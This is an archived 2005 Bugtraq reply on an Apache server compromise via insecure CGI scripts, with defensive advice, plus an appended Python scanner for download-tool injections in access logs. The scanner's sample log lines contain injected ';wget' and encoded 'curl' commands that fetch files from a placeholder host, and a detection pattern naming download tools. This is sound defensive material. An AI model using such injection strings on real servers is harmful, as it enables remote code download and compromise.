Bugtraq mailing list archives
Re: Apache hacks (./atac, d0s.txt)
From: Steve Kemp <steve () steve org uk>
Date: Fri, 29 Apr 2005 22:36:53 +0100
On Fri, Apr 29, 2005 at 02:03:58PM -0500, Andrew Y Ng wrote:
> My server has been seeing some usual activities today, I don't have much time to get down to the bottom of things, but after I investigated briefly I have decided to disable PERL executable permission for www-data (Apache process's user), also locked /var/tmp so www-data cannot write to it.

Use chroot to protect your server slightly more against problems with any buggy scripts.

This is almost certainly the result of an insecure PHP, Perl, or other CGI script - rather than an Apache hack.

If you examine your webserver's logs you might see where the attack happened, perhaps you'll have entries invoking the 'wget' command to download the script you found from a remote server - that's often a common attack.

If you're interested in protecting your server against input designed to attack insecure applications you might wish to investigate 'mod_security'.

mod-security homepage:
http://www.modsecurity.org/

mod-security under Debian example:
http://www.debian-administration.org/?article=65

> Looks like it ignores all the `kill` signals, not sure how I can actually kill it...

As root.

> here's d0s.txt:

Connects to an IRC server, forking to make its name less obvious on the process list.

Steve
--
# Debian System Administration
www.debian-administration.org/
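
The log check suggested in the reply above, as an added example that is not part of the original post: it scans Apache access-log lines for requests whose URL-decoded query string invokes a download tool. It goes beyond the `wget` case named in the reply by also matching `curl`, `fetch` and `lynx`; the sample log lines, addresses and the script names `view.pl` and `show.php` are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Common/combined log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# A download tool followed by an argument; the tool list is an assumption to extend.
FETCH_RE = re.compile(r'(?<![\w.-])(wget|curl|fetch|lynx)\s+\S', re.I)


def decode(text, rounds=3):
    """URL-decode repeatedly so double-encoded input (%2520) is also caught."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def suspicious_requests(lines):
    """Return (host, time, status, decoded target) for requests invoking a fetch tool."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        # Only the query string is inspected, so a static file named
        # wget-1.9.tar.gz in the path is not reported.
        _, _, query = m.group("target").partition("?")
        if FETCH_RE.search(decode(query)):
            hits.append((m.group("host"), m.group("time"),
                         m.group("status"), decode(m.group("target"))))
    return hits


# Constructed sample lines (documentation addresses, hypothetical script names).
SAMPLE = [
    '192.0.2.10 - - [29/Apr/2005:13:01:02 -0500] "GET /index.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/Apr/2005:13:05:44 -0500] "GET /cgi-bin/view.pl?page=;wget%20http://example.invalid/d0s.txt HTTP/1.0" 200 312',
    '192.0.2.33 - - [29/Apr/2005:13:09:10 -0500] "GET /downloads/wget-1.9.tar.gz HTTP/1.1" 200 90112',
    '198.51.100.7 - - [29/Apr/2005:13:11:27 -0500] "GET /show.php?f=x%253Bcurl%2520-O%2520http://example.invalid/atac HTTP/1.0" 200 88',
]

if __name__ == "__main__":
    for host, when, status, target in suspicious_requests(SAMPLE):
        print(host, when, status, target)
```

POST bodies are not recorded in the access log, so a clean result here does not rule out a script abused through a POST request.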